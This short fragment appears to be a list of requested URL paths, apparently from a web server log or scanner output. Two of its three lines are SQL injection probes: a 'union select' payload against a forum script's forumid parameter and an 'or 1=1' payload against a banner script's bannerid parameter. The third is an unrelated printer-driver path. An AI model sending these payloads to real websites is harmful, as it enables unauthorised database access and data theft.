/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1332010406,4,5

/cgi-bin/www/delivery/ac.php?bannerid=-221+or+1=1

/hp deskjet 670c and 672c driver_information/

